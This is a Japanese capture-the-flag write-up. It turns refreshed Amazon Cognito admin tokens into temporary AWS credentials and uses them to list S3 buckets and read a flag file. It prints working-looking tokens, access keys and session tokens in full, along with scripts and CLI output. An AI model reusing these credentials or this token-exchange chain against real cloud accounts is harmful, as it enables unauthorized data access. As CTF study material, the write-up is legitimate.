Can you see Flag's Bucket lying deep within GEToken? I am ... Cognito ... ?
`ap-northeast-1:05611045-eb46-41e2-9f6c-f41d87547e4d`
IdentityPoolIdが与えられる。
GETokenの続き問題のようだ。
以下が取得できていた。
{"CognitoIdentityServiceProvider.919149.refreshToken":"eyJjdHkiOiJKV1QiLCJlbmMiOiJBMjU2R0NNIiwiYWxnIjoiUlNBLU9BRVAifQ.SYKf_HIJSgHwTG-wFI8jPrzej5J7LpA-j0qp_yBYhnxfPwxZ1uJIThUtpszOyNy3DG9O7NfLl0wL7FxsqfWtz2YE1VcaucvBqT04B5S9OhospiMnP7WnOZhurhxnBJBElAdPioh6DxCUEyC6ZHCAN-AOzTa-l_fqQ1Eaa7WvrmebPpCZAe_YsWIcMGLK4oqGSjiJC41BV4ogb-dOAn7M2VfOILGDJ75SZH4tkA6HRPHnqDertvM3E7Ceua2BlQHX30D2VuwDUft4Qm8czgTAGZnzPjcgyEYwBnAJR9nB47n24Ehqdg-LmduzGg6gy__N6S2qY2VqHUOgexDhpVedKg.hUetLDqLPsVjyfKU.LiBC_Fs_eDkDVg7sUMfOGNUsVHa3yu96sG-3SUnmgR8U5FeeKoXik2X3NLCzOJ6VWL1CkcNDR8JbAzsYadzv9mVBNkr4o4c23NKfj2EFk5aOnDBbJli7bKHAqHbWMycCC8hqP8afT12swAjcjD4UasBan04D1x0TVirhk1giU-kgitI79UBhPhFbEfezXZSJqkyDXen3Jp6L3yKF1zCahfKd3rKHumB7mtiqOtEDpH2QcD7ypo9mdniEICX4h52Al2GLjyXdVKID-9lD3OHkQUs8-8qgF11WFCUmMtmlQJ62-2GK9TE6MLAJzLVRZ_iQSpd4VqMPsIuksTJQaDb4CpWORhbqF1Y0YaiwH0i1UBNfobNqCYacnB_vwLA5j16H4Ucp2l_85rLmxU_z87_Yr_V3t_KDcInIGtNxxpitb1HXiq5t2xtsNFUQzOZRWngfm5jWHgaf1tKvUATuOaUUod5VUTFSNThHU1gjC5cOmOe0JM15CfWNFtCR0IsuYqo7NcQ7E0VDjKvwMoFGDU_6bfFK6X6yTYrZJCLfbNlxm_9o8VNYAX0y6eYUbDaiDtvjYVpcP06Vz7froJs1Hpv-ilvsmrWqJt-NaZyHtpfPO6AW36ORSBpwmbju14NCuNZVlEJ_xBorD8CnIqhp1Gta4g5u8wskIImLYpn6hH7rf-3r99bMHeixzuJW-EIpZi-JosH5IpH6ViuTJdPtFET7vfiGqaCZiObKDudPQOF35TUAi2NZRcqdza2G_CxTLMxf4o8ALCgWndbx0Ya4eUZj4sBdGgp2QpPJ_4GhWEI30Yz5jkrB890z5RWU0Pznxpa6eoHa9u-_Q0SITRYSutub-nQI4zjbcZSOmSBJCt7KMouwAfuLgXGHrrPvn3okuYq9epxP8NG2nAadbxw_H98NNdhkriJG4diMz1Ow1MiKgjkDkqnwy8CieFBhGPKdnSJrO7BFmvzWqmVV7yHYTX37OoetKTnhDn82iYyUhs5u2DbhLPG-nFGakIJqMMT-_xZdc73l8AWKQ_SVATvqnaUPkNwyQY90l8RRtpfVu0GeX7JFVSn0RtEadS1PRmdtxLTOioDs45hszW5TnO59nBWvmYtUpbJJGppZ3NVf9O_FA8Ncp8Dm_6qf-XjegKOfPpbzKO9WrcpXJBjTsr7s4XWxwepgsLvKa7W_pVkISaY8L8GCHyAguQZ1aOQOxVUt4m9pjonLPGZ28jU_LN3WQcK_wwNmVGk1Qjq7t7OfAl5vqV3yQb6HT2_tidzQqEV8V3fRuF5V8QhKOOpEwNK79Lg3.ZnSmJ61LICnAUb7Tv0L0cg","CognitoIdentityServiceProvider.919149.idToken":"eyJraWQiOiJYU0pnQnFGVTlDQmJQRTdmMGtPVHI3V3NSaGlMZHoySGw0YnliVXZlYWtRPSIsImFsZyI6IlJTMjU2In0.eyJzdWIiOiI0OGNiYzk4OS04OGQzLTQzNTUtYmYwOC00YjEyZjIyZWQ5NjMiLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiY3VzdG9tOmZsYWciOiJmbGFne2M4MWU3MjhkOWQ0YzJmNjM2ZjA2N2Y4OWNjMTQ4NjJjfSIsImlzcyI6Imh0dHBzOlwvXC9jb2duaXRvLWlkcC5hcC1ub3J0aGVhc3QtMS5hbWF6b25hd3MuY29tXC9hcC1ub3J0aGVhc3QtMV83UkN3NGlzTTkiLCJjb2duaXRvOnVzZXJuYW1lIjoiYWRtaW4iLCJvcmlnaW5fanRpIjoiM2ZhOGY0Y2ItM2JlMi00NDYzLTkzYTQtYTg5Y2JkOGQ1Mzk4IiwiYXVkIjoiNnA1YTVjZnU2NDd2bGgwdmEwcWVoaHZ2bHEiLCJldmVudF9pZCI6ImRiYzQ3MmVjLTdkMTctNDU1NC1iNjk1LTBmMzI4MTZhZWI1YyIsInRva2VuX3VzZSI6ImlkIiwiYXV0aF90aW1lIjoxNzExNjk1NTQ4LCJleHAiOjE3MTE2OTkxNDgsImlhdCI6MTcxMTY5NTU0OCwianRpIjoiNTcyM2YwMDQtZmQ4NS00YjYzLWIxY2YtNjEyZGYxYmY0N2Y4IiwiZW1haWwiOiJuLnNhaXRvQGF6YXJhLmpwIn0.KtD9NKljSBpqtCbS8uif-IRGqo0Eefl6ovQZ05ZxJ9wmU8S3-Qy7S_DPV8orheGyZZ-vhIw1nrdKmZZCZnWl8rN8-j6AksqsQZol-qILzkDefaRE7T2ZDphFvQXXVcMXNsRVphKWKleze9ERLj33JgxI2gIsTs1N5o9sxpmGaDgewthKmzM1EYYAn9w4PQh-FmG8x_hrgvFhyoavfKo3lirVAwXMpBvhCzjMo50wQ2S9P4VA-6hGnE68o3o4FiGVAvEGY_5KD4uB4244njFNpgy0TTUOVYpAtybNjupmOzCeEX57kP743oUxpKypuTDpevidWJaHoFyP2A9imGxLUQ","CognitoIdentityServiceProvider.919149.accessToken":"eyJraWQiOiJLMUJNdE92S0tjT0hpNFNxdlI4bHE1NDl4VUlWZTM2N25VZnlqUVRodHlzPSIsImFsZyI6IlJTMjU2In0.eyJzdWIiOiI0OGNiYzk4OS04OGQzLTQzNTUtYmYwOC00YjEyZjIyZWQ5NjMiLCJpc3MiOiJodHRwczpcL1wvY29nbml0by1pZHAuYXAtbm9ydGhlYXN0LTEuYW1hem9uYXdzLmNvbVwvYXAtbm9ydGhlYXN0LTFfN1JDdzRpc005IiwiY2xpZW50X2lkIjoiNnA1YTVjZnU2NDd2bGgwdmEwcWVoaHZ2bHEiLCJvcmlnaW5fanRpIjoiM2ZhOGY0Y2ItM2JlMi00NDYzLTkzYTQtYTg5Y2JkOGQ1Mzk4IiwiZXZlbnRfaWQiOiJkYmM0NzJlYy03ZDE3LTQ1NTQtYjY5NS0wZjMyODE2YWViNWMiLCJ0b2tlbl91c2UiOiJhY2Nlc3MiLCJzY29wZSI6ImF3cy5jb2duaXRvLnNpZ25pbi51c2VyLmFkbWluIiwiYXV0aF90aW1lIjoxNzExNjk1NTQ4LCJleHAiOjE3MTE2OTkxNDgsImlhdCI6MTcxMTY5NTU0OCwianRpIjoiOTU4NmU0ZjgtZTljYy00YmJhLTk0NmYtNDMyOWE5ZTlmMGU0IiwidXNlcm5hbWUiOiJhZG1pbiJ9.1YxKXKO3Oew6WdBP-lOeWvIabnb1kNRznOq5d_28RuvgUS-Kn02XzOm8AEEtn76FeSmdsAR58OKoUgyt_bb8rlwDt69xYxdFrSixh15FVsVqZHPwCXYcrUADKAF3XuoooceZfXL9At6TV2r7Qmw3kuOsGnz07bI3T22OILO9p9rOMotih1lf3_xOT00y-2lrENhPNk8WNp2aHSItxJ9lUgB0NrSTWS_554V9p4SAun9U2nh4CVnfCo1rKR9eb_MSGdmbFVFmjCL_wSieCI0ZeMHCtz01G7xCkygaNrBLZLf7ZFyS4xKbMlDCPPQjNatUiUYgbQGt7FliEyVpBp4R6Q"}これらを用いてBucketの中を探す必要があるようだ。
idTokenをデコードすると以下である。
{
"sub": "48cbc989-88d3-4355-bf08-4b12f22ed963",
"email_verified": true,
"custom:flag": "flag{c81e728d9d4c2f636f067f89cc14862c}",
"iss": "https://cognito-idp.ap-northeast-1.amazonaws.com/ap-northeast-1_7RCw4isM9",
"cognito:username": "admin",
"origin_jti": "3fa8f4cb-3be2-4463-93a4-a89cbd8d5398",
"aud": "6p5a5cfu647vlh0va0qehhvvlq",
"event_id": "dbc472ec-7d17-4554-b695-0f32816aeb5c",
"token_use": "id",
"auth_time": 1711695548,
"exp": 1711699148,
"iat": 1711695548,
"jti": "5723f004-fd85-4b63-b1cf-612df1bf47f8",
"email": "[email protected]"
}expは過ぎていた。
refreshTokenがあるので、以下のxs3_1.jsで再取得すればよい。
ちなみにGETokenから取得してすぐならば使えるので、この手順は不要となる。
const { CognitoIdentityProviderClient, InitiateAuthCommand } = require("@aws-sdk/client-cognito-identity-provider");
const REGION = "ap-northeast-1";
const clientId = "6p5a5cfu647vlh0va0qehhvvlq";
const refreshToken = "eyJjdHkiOiJKV1QiLCJlbmMiOiJBMjU2R0NNIiwiYWxnIjoiUlNBLU9BRVAifQ.SYKf_HIJSgHwTG-wFI8jPrzej5J7LpA-j0qp_yBYhnxfPwxZ1uJIThUtpszOyNy3DG9O7NfLl0wL7FxsqfWtz2YE1VcaucvBqT04B5S9OhospiMnP7WnOZhurhxnBJBElAdPioh6DxCUEyC6ZHCAN-AOzTa-l_fqQ1Eaa7WvrmebPpCZAe_YsWIcMGLK4oqGSjiJC41BV4ogb-dOAn7M2VfOILGDJ75SZH4tkA6HRPHnqDertvM3E7Ceua2BlQHX30D2VuwDUft4Qm8czgTAGZnzPjcgyEYwBnAJR9nB47n24Ehqdg-LmduzGg6gy__N6S2qY2VqHUOgexDhpVedKg.hUetLDqLPsVjyfKU.LiBC_Fs_eDkDVg7sUMfOGNUsVHa3yu96sG-3SUnmgR8U5FeeKoXik2X3NLCzOJ6VWL1CkcNDR8JbAzsYadzv9mVBNkr4o4c23NKfj2EFk5aOnDBbJli7bKHAqHbWMycCC8hqP8afT12swAjcjD4UasBan04D1x0TVirhk1giU-kgitI79UBhPhFbEfezXZSJqkyDXen3Jp6L3yKF1zCahfKd3rKHumB7mtiqOtEDpH2QcD7ypo9mdniEICX4h52Al2GLjyXdVKID-9lD3OHkQUs8-8qgF11WFCUmMtmlQJ62-2GK9TE6MLAJzLVRZ_iQSpd4VqMPsIuksTJQaDb4CpWORhbqF1Y0YaiwH0i1UBNfobNqCYacnB_vwLA5j16H4Ucp2l_85rLmxU_z87_Yr_V3t_KDcInIGtNxxpitb1HXiq5t2xtsNFUQzOZRWngfm5jWHgaf1tKvUATuOaUUod5VUTFSNThHU1gjC5cOmOe0JM15CfWNFtCR0IsuYqo7NcQ7E0VDjKvwMoFGDU_6bfFK6X6yTYrZJCLfbNlxm_9o8VNYAX0y6eYUbDaiDtvjYVpcP06Vz7froJs1Hpv-ilvsmrWqJt-NaZyHtpfPO6AW36ORSBpwmbju14NCuNZVlEJ_xBorD8CnIqhp1Gta4g5u8wskIImLYpn6hH7rf-3r99bMHeixzuJW-EIpZi-JosH5IpH6ViuTJdPtFET7vfiGqaCZiObKDudPQOF35TUAi2NZRcqdza2G_CxTLMxf4o8ALCgWndbx0Ya4eUZj4sBdGgp2QpPJ_4GhWEI30Yz5jkrB890z5RWU0Pznxpa6eoHa9u-_Q0SITRYSutub-nQI4zjbcZSOmSBJCt7KMouwAfuLgXGHrrPvn3okuYq9epxP8NG2nAadbxw_H98NNdhkriJG4diMz1Ow1MiKgjkDkqnwy8CieFBhGPKdnSJrO7BFmvzWqmVV7yHYTX37OoetKTnhDn82iYyUhs5u2DbhLPG-nFGakIJqMMT-_xZdc73l8AWKQ_SVATvqnaUPkNwyQY90l8RRtpfVu0GeX7JFVSn0RtEadS1PRmdtxLTOioDs45hszW5TnO59nBWvmYtUpbJJGppZ3NVf9O_FA8Ncp8Dm_6qf-XjegKOfPpbzKO9WrcpXJBjTsr7s4XWxwepgsLvKa7W_pVkISaY8L8GCHyAguQZ1aOQOxVUt4m9pjonLPGZ28jU_LN3WQcK_wwNmVGk1Qjq7t7OfAl5vqV3yQb6HT2_tidzQqEV8V3fRuF5V8QhKOOpEwNK79Lg3.ZnSmJ61LICnAUb7Tv0L0cg";
const client = new CognitoIdentityProviderClient({ region: REGION });
const command = new InitiateAuthCommand({
AuthFlow: "REFRESH_TOKEN_AUTH",
AuthParameters: {
REFRESH_TOKEN: refreshToken,
},
ClientId: clientId,
});
const refreshAccessToken = async () => {
try {
const response = await client.send(command);
console.log("accessToken:", response.AuthenticationResult.AccessToken);
console.log("idToken:", response.AuthenticationResult.IdToken);
} catch (error) {
console.error(error);
}
};
refreshAccessToken();実行する。
$ node xs3_1.js
accessToken: eyJraWQiOiJLMUJNdE92S0tjT0hpNFNxdlI4bHE1NDl4VUlWZTM2N25VZnlqUVRodHlzPSIsImFsZyI6IlJTMjU2In0.eyJzdWIiOiI0OGNiYzk4OS04OGQzLTQzNTUtYmYwOC00YjEyZjIyZWQ5NjMiLCJpc3MiOiJodHRwczpcL1wvY29nbml0by1pZHAuYXAtbm9ydGhlYXN0LTEuYW1hem9uYXdzLmNvbVwvYXAtbm9ydGhlYXN0LTFfN1JDdzRpc005IiwiY2xpZW50X2lkIjoiNnA1YTVjZnU2NDd2bGgwdmEwcWVoaHZ2bHEiLCJvcmlnaW5fanRpIjoiM2ZhOGY0Y2ItM2JlMi00NDYzLTkzYTQtYTg5Y2JkOGQ1Mzk4IiwiZXZlbnRfaWQiOiJkYmM0NzJlYy03ZDE3LTQ1NTQtYjY5NS0wZjMyODE2YWViNWMiLCJ0b2tlbl91c2UiOiJhY2Nlc3MiLCJzY29wZSI6ImF3cy5jb2duaXRvLnNpZ25pbi51c2VyLmFkbWluIiwiYXV0aF90aW1lIjoxNzExNjk1NTQ4LCJleHAiOjE3MTE3MDY0ODQsImlhdCI6MTcxMTcwMjg4NCwianRpIjoiN2YyNmRjOWUtNDcwZi00NmU1LTgxYjYtZGQxODViNTI5MzdjIiwidXNlcm5hbWUiOiJhZG1pbiJ9.18Q7LqH6G13lJWjUEUxu65A2J_bQz_kJ_DMvUa0HCFDV1sALdvjjtXEs8Tjxtd4rNhyo2zo_dAj--G-NYE6sg_HVWme1w-8KIrqvf8fxYhqRWL4cGQhiZzZwZzTUnr832XF4swX9wdTp1BTdlOe1E3uhYI9_XJENlFzNXgNXlQBDmWFee7esopjW4jbU8LDZIXwV6acrOY7U2ccH9et-F26jQqKEA5vATy4JaskfzFnejSWsYRUt7Le0Vrk6fruviYzZ7lxzcxFWdr2cG4YR1_3KreVk1Scix7dcW5hLWJLCQsgshiTLNhc8AXRG5_23afOTYoGXBPXXSH0oPkTDag
idToken: eyJraWQiOiJYU0pnQnFGVTlDQmJQRTdmMGtPVHI3V3NSaGlMZHoySGw0YnliVXZlYWtRPSIsImFsZyI6IlJTMjU2In0.eyJzdWIiOiI0OGNiYzk4OS04OGQzLTQzNTUtYmYwOC00YjEyZjIyZWQ5NjMiLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiY3VzdG9tOmZsYWciOiJmbGFne2M4MWU3MjhkOWQ0YzJmNjM2ZjA2N2Y4OWNjMTQ4NjJjfSIsImlzcyI6Imh0dHBzOlwvXC9jb2duaXRvLWlkcC5hcC1ub3J0aGVhc3QtMS5hbWF6b25hd3MuY29tXC9hcC1ub3J0aGVhc3QtMV83UkN3NGlzTTkiLCJjb2duaXRvOnVzZXJuYW1lIjoiYWRtaW4iLCJvcmlnaW5fanRpIjoiM2ZhOGY0Y2ItM2JlMi00NDYzLTkzYTQtYTg5Y2JkOGQ1Mzk4IiwiYXVkIjoiNnA1YTVjZnU2NDd2bGgwdmEwcWVoaHZ2bHEiLCJldmVudF9pZCI6ImRiYzQ3MmVjLTdkMTctNDU1NC1iNjk1LTBmMzI4MTZhZWI1YyIsInRva2VuX3VzZSI6ImlkIiwiYXV0aF90aW1lIjoxNzExNjk1NTQ4LCJleHAiOjE3MTE3MDY0ODQsImlhdCI6MTcxMTcwMjg4NCwianRpIjoiMWY1YWZlYzgtN2E5ZC00OWNiLWExODMtNTJhZmI3Y2MzMmIyIiwiZW1haWwiOiJuLnNhaXRvQGF6YXJhLmpwIn0.hwRo66KBOX8k-LFwsMJyfYRueXFPUEi0iVv6n3U-nWojiVN9ZtJYfUxF0-vlmhUTaTd2NXyCdaJPpodo7SY5_rFULIEWsv-cVyQOVjqAbWyGHLSGZZKVcRlz351VsHhOyceiZDjAwTMOEPdtWPJ-It30e_BXKIprTbRboFfjIP5j1bRUT1jfoF4X_pSYMYY1cbj2Qd4H-8NvVhwYx7tUGyaXd9JR820pI8qHGJju2w8PWQtL90CfGIjMr8KpoVFFFbfcbyVK7jNP-xRka4GIfBqgmQR5zRcCxMA9I5Mu-8WuMjd4F714joBmxVXh1LoCkKX-91Jykk8aFefhmyIN5g新たなaccessToken、idTokenが得られた。
これらを用いて、S3の一時的な認証情報を取得する。
以下のxs3_2.pyで行う。
import boto3
REGION_NAME = "ap-northeast-1"
IDENTITY_POOL_ID = "ap-northeast-1:05611045-eb46-41e2-9f6c-f41d87547e4d"
USER_POOL_ID = "ap-northeast-1_7RCw4isM9"
ID_TOKEN = "eyJraWQiOiJYU0pnQnFGVTlDQmJQRTdmMGtPVHI3V3NSaGlMZHoySGw0YnliVXZlYWtRPSIsImFsZyI6IlJTMjU2In0.eyJzdWIiOiI0OGNiYzk4OS04OGQzLTQzNTUtYmYwOC00YjEyZjIyZWQ5NjMiLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiY3VzdG9tOmZsYWciOiJmbGFne2M4MWU3MjhkOWQ0YzJmNjM2ZjA2N2Y4OWNjMTQ4NjJjfSIsImlzcyI6Imh0dHBzOlwvXC9jb2duaXRvLWlkcC5hcC1ub3J0aGVhc3QtMS5hbWF6b25hd3MuY29tXC9hcC1ub3J0aGVhc3QtMV83UkN3NGlzTTkiLCJjb2duaXRvOnVzZXJuYW1lIjoiYWRtaW4iLCJvcmlnaW5fanRpIjoiM2ZhOGY0Y2ItM2JlMi00NDYzLTkzYTQtYTg5Y2JkOGQ1Mzk4IiwiYXVkIjoiNnA1YTVjZnU2NDd2bGgwdmEwcWVoaHZ2bHEiLCJldmVudF9pZCI6ImRiYzQ3MmVjLTdkMTctNDU1NC1iNjk1LTBmMzI4MTZhZWI1YyIsInRva2VuX3VzZSI6ImlkIiwiYXV0aF90aW1lIjoxNzExNjk1NTQ4LCJleHAiOjE3MTE3MDY0ODQsImlhdCI6MTcxMTcwMjg4NCwianRpIjoiMWY1YWZlYzgtN2E5ZC00OWNiLWExODMtNTJhZmI3Y2MzMmIyIiwiZW1haWwiOiJuLnNhaXRvQGF6YXJhLmpwIn0.hwRo66KBOX8k-LFwsMJyfYRueXFPUEi0iVv6n3U-nWojiVN9ZtJYfUxF0-vlmhUTaTd2NXyCdaJPpodo7SY5_rFULIEWsv-cVyQOVjqAbWyGHLSGZZKVcRlz351VsHhOyceiZDjAwTMOEPdtWPJ-It30e_BXKIprTbRboFfjIP5j1bRUT1jfoF4X_pSYMYY1cbj2Qd4H-8NvVhwYx7tUGyaXd9JR820pI8qHGJju2w8PWQtL90CfGIjMr8KpoVFFFbfcbyVK7jNP-xRka4GIfBqgmQR5zRcCxMA9I5Mu-8WuMjd4F714joBmxVXh1LoCkKX-91Jykk8aFefhmyIN5g"
client = boto3.client("cognito-identity", region_name=REGION_NAME)
identity_response = client.get_id(
IdentityPoolId=IDENTITY_POOL_ID,
Logins={f"cognito-idp.{REGION_NAME}.amazonaws.com/{USER_POOL_ID}": ID_TOKEN},
)
identity_id = identity_response["IdentityId"]
credentials_response = client.get_credentials_for_identity(
IdentityId=identity_id,
Logins={f"cognito-idp.{REGION_NAME}.amazonaws.com/{USER_POOL_ID}": ID_TOKEN},
)
temp_credentials = credentials_response["Credentials"]
print(temp_credentials)実行する。
$ python xs3_2.py
{'AccessKeyId': 'ASIAU6GDZQDOD3SA246R', 'SecretKey': 'nPJ2zVojgpddsCc24BDwvYcqxiAOLujjfPaDDvTA', 'SessionToken': 'IQoJb3JpZ2luX2VjENH//////////wEaDmFwLW5vcnRoZWFzdC0xIkcwRQIhAP2fepL8pvoIhsYpM0Ep3FHbICaihxEi9GmoGaqDcsmuAiAKsw/5Wev7/TTl+1pr6P9rbvsECYXzU1XMs/BjO9/Fuiq8BQjq//////////8BEAAaDDMzOTcxMzAzMjQxMiIMxfVETakytKu89WhAKpAF8B9Z/uHndxlGvEk2NevmzSuGPF2N+dOpExT+WHS7O7SLhw7Qm6InQ1O7aBEacEqu4CLs2sx0M/hJdQeme80fgXZrENNDq2c9gTgaU6SCJQSFtzD3t8MT6czklivSWmdFspjI+9w8yH0dICw6JA+8YsU8FalG/rUOodc+LcuATpt0L1KZok+DbqxsHF9WnRpiNVAljyiizW0/+BpkwahtcJbvxCn5Y7XhFhetF5cVP4iXXXlrYmx2l7JeLOTnsGztkbujPmIpK8FuLxo6IAde4tCHsn1Qjamb5HXjbJ7UPzpJ85EGgCJ40sg/8VQLcffTMeS6fLD/SvjV7kyUAxY90BFcumoh99t7DYrX5dLrJ57xHHX9zE/K3dvI6ZA7jv5/Gz8NFoWpzDsuUyJuDTms1I4inUJ1S2HavErxykhmAbDaz22kRTD/ox4tz4DzcL3bNOPKoCUAiGq0RPZQRzpm2DiUkfJTKTZC9sCMYXl1K8OkibiFqURFmR7jYlqwO0fEFMaVM8XVr+78+bFPDY77oNPRZUCsDAPNQgzDvZLu7s3awyhilrChQHjf8bh9qOg5xZrQDe6cAg0+fBlNU8PBOnjNL7ITn1sATphDT4exrsvpne5EREF0wdIsUHG20SBjLfuNHLERD30wQ0fQFbx4tEgXIwDXsFDcdujaDW8ja+sABtsHWFlKrxJgymB+icU4jajlAgpAXM6dz8DdddV4+Gt+f+0aQXCtpi/hWnqglEM05wfOBpo7bwMdWBMYPhsFJOjyU2eaF3ucd/Ut+GAzrYjKxA/BnpOsyCI0pLGaQL8jfeLolmBm3HeRzmjwci7CJKK2cvUVzpCv3eslbw1bxAh32LQzyq1Q+Ctcc3BM0KAw8ImasAY6hQLUjRIu+wh4zKueXVXrgmATngIJLRdmua3E9PzBTGuNsAOGQMK82RE950/oww4IcOfqlzkimrWpGCwCraI1oRXK+duwtUpTyCOy+OAwNHmSuStfgmQu8gIkfs8F3uqpxajtamEvwBe/vvfP/fr9qA5KotmMO11cwF5xpllk+Xx9H2muJtQmX/+mQBQ6wtLR33oL3fIBySCHsxt4VO44Efz2mtQlU/nHTKKWGo06WBoQgjYJNBv1zARIGeTvHgTyW6w99VHSmryvOLgrtL2giA0uf3Cb4pQxeHf2aU3OaycjvM1ypQbPuDicFXD6KHItAkcZ8+Mi/NG4ZlEkZ2rhoaNCzelhYV8=', 'Expiration': datetime.datetime(2024, 3, 29, 19, 8, tzinfo=tzlocal())}これで必要な情報はすべて得られたのでBucketを自由に探検する。
先ほどのpythonで行ってもよいがAWS CLIを用いる。
$ export AWS_ACCESS_KEY_ID='ASIAU6GDZQDOD3SA246R'
$ export AWS_SECRET_ACCESS_KEY='nPJ2zVojgpddsCc24BDwvYcqxiAOLujjfPaDDvTA'
$ export AWS_SESSION_TOKEN='IQoJb3JpZ2luX2VjENH//////////wEaDmFwLW5vcnRoZWFzdC0xIkcwRQIhAP2fepL8pvoIhsYpM0Ep3FHbICaihxEi9GmoGaqDcsmuAiAKsw/5Wev7/TTl+1pr6P9rbvsECYXzU1XMs/BjO9/Fuiq8BQjq//////////8BEAAaDDMzOTcxMzAzMjQxMiIMxfVETakytKu89WhAKpAF8B9Z/uHndxlGvEk2NevmzSuGPF2N+dOpExT+WHS7O7SLhw7Qm6InQ1O7aBEacEqu4CLs2sx0M/hJdQeme80fgXZrENNDq2c9gTgaU6SCJQSFtzD3t8MT6czklivSWmdFspjI+9w8yH0dICw6JA+8YsU8FalG/rUOodc+LcuATpt0L1KZok+DbqxsHF9WnRpiNVAljyiizW0/+BpkwahtcJbvxCn5Y7XhFhetF5cVP4iXXXlrYmx2l7JeLOTnsGztkbujPmIpK8FuLxo6IAde4tCHsn1Qjamb5HXjbJ7UPzpJ85EGgCJ40sg/8VQLcffTMeS6fLD/SvjV7kyUAxY90BFcumoh99t7DYrX5dLrJ57xHHX9zE/K3dvI6ZA7jv5/Gz8NFoWpzDsuUyJuDTms1I4inUJ1S2HavErxykhmAbDaz22kRTD/ox4tz4DzcL3bNOPKoCUAiGq0RPZQRzpm2DiUkfJTKTZC9sCMYXl1K8OkibiFqURFmR7jYlqwO0fEFMaVM8XVr+78+bFPDY77oNPRZUCsDAPNQgzDvZLu7s3awyhilrChQHjf8bh9qOg5xZrQDe6cAg0+fBlNU8PBOnjNL7ITn1sATphDT4exrsvpne5EREF0wdIsUHG20SBjLfuNHLERD30wQ0fQFbx4tEgXIwDXsFDcdujaDW8ja+sABtsHWFlKrxJgymB+icU4jajlAgpAXM6dz8DdddV4+Gt+f+0aQXCtpi/hWnqglEM05wfOBpo7bwMdWBMYPhsFJOjyU2eaF3ucd/Ut+GAzrYjKxA/BnpOsyCI0pLGaQL8jfeLolmBm3HeRzmjwci7CJKK2cvUVzpCv3eslbw1bxAh32LQzyq1Q+Ctcc3BM0KAw8ImasAY6hQLUjRIu+wh4zKueXVXrgmATngIJLRdmua3E9PzBTGuNsAOGQMK82RE950/oww4IcOfqlzkimrWpGCwCraI1oRXK+duwtUpTyCOy+OAwNHmSuStfgmQu8gIkfs8F3uqpxajtamEvwBe/vvfP/fr9qA5KotmMO11cwF5xpllk+Xx9H2muJtQmX/+mQBQ6wtLR33oL3fIBySCHsxt4VO44Efz2mtQlU/nHTKKWGo06WBoQgjYJNBv1zARIGeTvHgTyW6w99VHSmryvOLgrtL2giA0uf3Cb4pQxeHf2aU3OaycjvM1ypQbPuDicFXD6KHItAkcZ8+Mi/NG4ZlEkZ2rhoaNCzelhYV8='
$ aws s3api list-buckets --query "Buckets[].Name"
[
"cdk-hnb659fds-assets-339713032412-ap-northeast-1",
"deliverybucket-5250c0a74f-adv-3-delivery",
"specialflagbucket-5250c0a74f-adv3-special-flag",
"uploadbucket-5250c0a74f-adv-3-upload"
]
$ aws s3 ls s3://specialflagbucket-5250c0a74f-adv3-special-flag
2024-03-25 14:06:42 38 flag.txt
$ aws s3 cp s3://specialflagbucket-5250c0a74f-adv3-special-flag/flag.txt -
flag{eccbc87e4b5ce2fe28308fd9f2a7baf3}s3://specialflagbucket-5250c0a74f-adv3-special-flag/flag.txtからflagが得られた。